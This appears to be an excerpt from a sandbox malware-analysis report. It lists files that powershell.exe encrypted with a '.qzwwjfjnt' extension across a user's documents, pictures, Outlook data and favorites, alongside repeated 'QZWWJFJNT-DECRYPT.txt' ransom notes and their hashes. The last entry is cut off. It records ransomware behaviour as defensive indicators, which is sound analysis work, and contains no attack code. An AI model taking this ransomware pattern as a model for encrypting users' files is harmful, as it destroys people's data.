SHA256: e9601c489563e2804045ddda2dcd24b615e6e0f194ca66f2f9b3b06e0d2b30b7
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Pictures\perhapswar.jpg.qzwwjfjnt
binary
MD5: 89187477861fb4d86e48d9989fbf8796
SHA256: 2c9779ffca385e8311c21e86a67240bd2bf3622f1af932ea3e0ea826f1b0c97e
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Pictures\qrecently.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Pictures\perhapswar.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Pictures\herecountry.jpg.qzwwjfjnt
binary
MD5: 4aa61c2fb786328f24c1ec41d8c5c309
SHA256: 4eb95587ca7ae49f2fe038651306f9160184184828179db38813f1a67f366a3e
256
powershell.exe
C:\Users\admin\Pictures\investmentprojects.png.qzwwjfjnt
binary
MD5: 3bdd8bf81428724b6edef60e5eaef0c3
SHA256: 2b9887d47926ea8df1ed444a1ed98808a34276b763179af5df8adf2c3c1489ad
256
powershell.exe
C:\Users\admin\Pictures\investmentprojects.png
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Pictures\herecountry.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\ntuser.ini.qzwwjfjnt
binary
MD5: 2ce0054e00e08001ed256af4933569af
SHA256: 222afed2e4139100999d36969a6886ff720cc6b12df5a3b772d527757e6b0879
256
powershell.exe
C:\Users\admin\Links\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.qzwwjfjnt
binary
MD5: 1561a5fbe167a62490d9341d099727cf
SHA256: 4f9fa2bc67cf4a69ee1cf857f5368ca05944611bc14277216710b712ac8b7e8a
256
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\ntuser.ini
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.qzwwjfjnt
binary
MD5: eec95e63ea0041c48fe36d30c0a61c15
SHA256: 521edde925ff032a12891f7536d6062a28839fb0c0c99805b209677d1b68346e
256
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.qzwwjfjnt
binary
MD5: a4d810adb92cd85e8df0985faae20e66
SHA256: a0df4108e55712eeb4826311d7d9cebac1c7d1f514cf818b8031dee1d47ce5ce
256
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.qzwwjfjnt
binary
MD5: dfeb7a507bd4a10a39a0dc53ff0644d0
SHA256: 92e3d643a9e5e36faf07b6c45a2ba0f5e9d7e3d602dff2d381abbd1a97ebc3d1
256
powershell.exe
C:\Users\admin\Favorites\Windows Live\Get Windows Live.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.qzwwjfjnt
binary
MD5: 17a53f640df32c8a40978fb5b5e8657d
SHA256: abe9913b8ce0f48654fcb765055bd0e554a792f003be9f243f03ff166e7adf60
256
powershell.exe
C:\Users\admin\Favorites\Windows Live\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSNBC News.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url.qzwwjfjnt
binary
MD5: 96d3091df52381cb1a8a5d95e4631cf4
SHA256: 0aab98c8d32f56d30954066aa6c3659b1db74481b826e71f32ce7d6b4dfa1b5f
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.qzwwjfjnt
binary
MD5: d031645fc87358ab2484faf1cfd3423d
SHA256: 0841491fdc56c9cac1185f7f5754d1001fc64bfe64c98869a91906321dd81bc9
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Sports.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url.qzwwjfjnt
binary
MD5: 0f76701e84aaf89ccb66336a198a7230
SHA256: dcf78a006ea2a0d003a34d17bf8256efa41a6546704a271b6cf481efbcaacb96
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Money.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.qzwwjfjnt
binary
MD5: 8bf885bf239d1d65cf520a149b1e7c6c
SHA256: ea08de30c6237f44aede898b05f27ea1983abe8a38e2b2bdd46f0308cfde3835
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.qzwwjfjnt
binary
MD5: b3b165bd7c1decbd1202811a3c2e6e3c
SHA256: 946090987aa5f7d2edbe3239886d0ff46b75e472cc64e2ccff5748c1939e0ec6
256
powershell.exe
C:\Users\admin\Favorites\MSN Websites\MSN Autos.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.qzwwjfjnt
binary
MD5: c3a3c5f5d38c7dc4418713991fe20605
SHA256: 7be928b1f602cdc6447bb05cb75981b6a414f0dadbd01076065008c0d1f60354
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.qzwwjfjnt
binary
MD5: 339f13cb1e67fd9c63f808ee203d6fea
SHA256: d573062b11328ad6e89ced4079db759fdd70b83ebf93e75ac7cf88a76336b579
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.qzwwjfjnt
binary
MD5: ce3ebb76df3a1e3e7875b5cfa01d02d0
SHA256: 96321c800d36ef5dfa26f18b80b48e15a3a4c99e654b7257be8706db85df9c8f
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.qzwwjfjnt
binary
MD5: 8b4fa59c3e8ac0100a6f31addb7ecf99
SHA256: bce74db93d6eb44fa3cf81699c6adf368ca1f264bfcf61f93fbe963aa2e9c43a
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.qzwwjfjnt
binary
MD5: 2d0b434ab95a0821492a0c367a77a1bd
SHA256: 07c421b568f0f3c44fef4fad4c2eede68101baf60f2ac91fda1547697f12c1a0
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Microsoft Websites\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url.qzwwjfjnt
binary
MD5: 72a4d8349546878a13611eba386be9d1
SHA256: d059ce2cbda070e0519495c4dcb8a8bce2819aa58028f1ab837710ee3d367bbc
256
powershell.exe
C:\Users\admin\Favorites\Links for United States\USA.gov.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.qzwwjfjnt
binary
MD5: 5027b5ae877f06a9fff0418a52d80e46
SHA256: b81e5d818d859b86f18bbc6c86b938ab6ff62d0030ddf44edfc958833b792701
256
powershell.exe
C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url.qzwwjfjnt
binary
MD5: 4c3c3012c758631d86bcb193865c54b5
SHA256: 6932ebef3d36962d3c8a0a91603549b296b44d90bd376f3d05f43e08c7248d7d
256
powershell.exe
C:\Users\admin\Favorites\Links for United States\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Favorites\Links\Web Slice Gallery.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url.qzwwjfjnt
binary
MD5: 805c47e677a9c1eb952a84bbabc7c971
SHA256: 2cf6f1224ba76f97f135ed9127386bba148be73070361f4a807082e4ac889e3e
256
powershell.exe
C:\Users\admin\Downloads\usingjournal.png.qzwwjfjnt
mp3
MD5: f4e59bf58e4258453c4a3c3f9fafeb6c
SHA256: 2c2ff3814d6e8e46828ccf62ac874959b07214bf2d05ba55f134f460a88da159
256
powershell.exe
C:\Users\admin\Favorites\Links\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Favorites\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Favorites\Links\Suggested Sites.url
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Downloads\usingjournal.png
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Downloads\presentkids.jpg.qzwwjfjnt
binary
MD5: 63815c67b1e358bb50867cc129ba4d59
SHA256: fa4de0ce2ab2509551898d29e6f331a24a7ade636ec46852d87f965df56797e1
256
powershell.exe
C:\Users\admin\Downloads\presentkids.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Downloads\goodsad.png.qzwwjfjnt
binary
MD5: e0b0bab03c6d452d3837161e5d9e32e2
SHA256: 9baf1cbbf079e04302d207713cf0e75a5b1e55d273d609f30ed66ede7a34c3c4
256
powershell.exe
C:\Users\admin\Downloads\auctionout.jpg.qzwwjfjnt
binary
MD5: 933cea1169a4bd16ca7fa6e34db549dc
SHA256: 2d5412718eea111752c36c9fdf07accd5cd7e102150fde5b7b1f7dee3455bde3
256
powershell.exe
C:\Users\admin\Downloads\makeslist.jpg.qzwwjfjnt
binary
MD5: 3734d066e9ddc95a474817f8fba16f09
SHA256: e1ef370aa569e20e084f35d843ea08378d8a5b2b05e48378dcd4b3c64f04e055
256
powershell.exe
C:\Users\admin\Downloads\goodsad.png
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Downloads\makeslist.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Downloads\americanideas.jpg.qzwwjfjnt
binary
MD5: a68db1b16bfd323db5123c3a8631596e
SHA256: f30b2e04618b6c9fe42cbd454615f77064b79e4c60b4a8e237f9a1127b2e14d9
256
powershell.exe
C:\Users\admin\Downloads\americanideas.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Downloads\auctionout.jpg
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\totalsingle.rtf.qzwwjfjnt
binary
MD5: 3504a82441eb29875b8ee22289ecf647
SHA256: 9c0a04327fbf65e5f73ad4490bdd867ad5c9a01191ab16cf1630a39fa99bcb51
256
powershell.exe
C:\Users\admin\Documents\sportmeet.rtf.qzwwjfjnt
binary
MD5: 75ebf613ba980c73496ac3d3edde6775
SHA256: 1e1a3d13d0796ee4a8aa73a2a69a296d0cabc330cc528f4e939fbd6ed708f998
256
powershell.exe
C:\Users\admin\Documents\wednesdaycredit.rtf.qzwwjfjnt
binary
MD5: b0c479a16c0e05fe59e07f5c561c784a
SHA256: 927d1a9c66452cefad9f0ea686632d16df3f8b8f7f73b3ddc9878b5ad817b326
256
powershell.exe
C:\Users\admin\Documents\seppurpose.rtf.qzwwjfjnt
binary
MD5: b4dd1a8e2de4168259b5e8a9f2dc3777
SHA256: 75bf787ed473a5b02007783aa88450dc61e9834bae45d6d61404c0620f0791e1
256
powershell.exe
C:\Users\admin\Downloads\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Documents\wednesdaycredit.rtf
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\totalsingle.rtf
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\sportmeet.rtf
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\purposediscussion.rtf.qzwwjfjnt
binary
MD5: 5e33a38159c52d5bac160a13ba64f53f
SHA256: a69aaf93454e78c5b36d4932e4f9d797447fa52e1d2a93e23b754207f9a21475
256
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst.qzwwjfjnt
binary
MD5: 917ebc322f290f8b0d629f981b1482ab
SHA256: 203e76b614f8193642e37a70b70b5d03b4a6e2ea936a7c332a52786737cdeec4
256
powershell.exe
C:\Users\admin\Documents\seppurpose.rtf
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\purposediscussion.rtf
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.qzwwjfjnt
binary
MD5: 15e375a2e16ee9c024cf9c559a71ca8d
SHA256: 2e8043dadc01352d6862a42cf05977d54be05f744a71196f27599b619a76aabe
256
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook.pst
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.qzwwjfjnt
binary
MD5: 6c02676284e984e6c73b9c1ca154e1cb
SHA256: 4c4f77d225b996cd5bf515a16c631642237aa96ac0c926581f7d7ecd26a73029
256
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
binary
MD5: ec8d0cf3c6ab1c7610f085fd4eeca0cf
SHA256: dc98901a2f917760a75f965a02934ee38a7d0366da5613acdaa3909b15b2c150
256
powershell.exe
C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\Outlook Files\[email protected]
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\Outlook Files\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.qzwwjfjnt
ini
MD5: 311b37ca8fa3118e6148be8ae717f94a
SHA256: cc153734cc330878b2144e4424dff81a77d84b1269806dad810c2625b463c499
256
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.qzwwjfjnt
binary
MD5: 961bb4aea51ee2e8ae32b27100a36b9d
SHA256: a3dccf02673ab032d1931d26d17bbfa9e1b147c3f99227d90aa532199bf177fb
256
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.qzwwjfjnt
binary
MD5: e3a40261fa069b15a1a16b52aed6f9e7
SHA256: 97e31f1530d5439f8dff2b67d4656ef35f0bd064f281f608edbf77abb32abf0c
256
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\Personal\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Documents\OneNote Notebooks\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Documents\newwill.rtf.qzwwjfjnt
binary
MD5: 2ea32b2862ce764d099e90466b5e493f
SHA256: f7f4384db710db9a9ac326877c2d0f8f6de6f8b96b935db5a6e61e0351539dc0
256
powershell.exe
C:\Users\admin\Documents\newwill.rtf
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Videos\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Music\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Documents\knowbook.rtf.qzwwjfjnt
binary
MD5: 3ad5524b790de0c51bcb492f5f74ebc7
SHA256: 0d4e7bd868b916be206fca9f14dde04d2b31e415026a3a4b6b532cb2a0660b34
256
powershell.exe
C:\Users\admin\Pictures\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Desktop\uago.png.qzwwjfjnt
binary
MD5: d657872e73dea01879f613d2a8e1ad1f
SHA256: a827f46bc300c07b5a1a806c0cce9e6f3f0f1445a799d6262d6a8332f6df192a
256
powershell.exe
C:\Users\admin\Desktop\usingunion.rtf.qzwwjfjnt
binary
MD5: 1881293045fe8fed8c7c29d831ce7249
SHA256: eab978a4ab05e8d843b3dd9886f6f5b174ca893cc2374415a1d3bbb3046aa3e2
256
powershell.exe
C:\Users\admin\Documents\QZWWJFJNT-DECRYPT.txt
text
MD5: 5aa4ecdb6aa285114a4c153ef6072f0f
SHA256: 80a3a3e53e6da3d7bd807f29d8e860eee54b17dae8004bb1b198722ed167d5fd
256
powershell.exe
C:\Users\admin\Desktop\usingunion.rtf
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Desktop\uago.png
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Documents\knowbook.rtf
––
MD5:  ––
SHA256:  ––
256
powershell.exe
C:\Users\admin\Desktop\thesefour.jpg.qzwwjfjnt
binary
MD5: 4d0530499a6ae31797c234de6feaf625
SHA256: a9b899ad97e922e701ce4cd0f245fff72f8592c93887d4d65a731713a32098fb
256
powershell.exe
C:\Users\admin\Desktop\presentgalleries.rtf.qzwwjfjnt
binary
MD5: 5720cf6ff5c1707f3faf78c567301b32
SHA256: 491006dd99af55addff23aec67f03ab9b051dff3a00042b8c69b0f5634417759
256
powershell.exe
C:\Users\admin\Desktop\totalrequirements.rtf.qzwwjfjnt
binary
MD5: b5260fdd663bfb6f464cc5547954bb48
SHA256: 373432e96cd853fb8f4e8f52a70b985b0f18ef51889d2c2a4ff0f3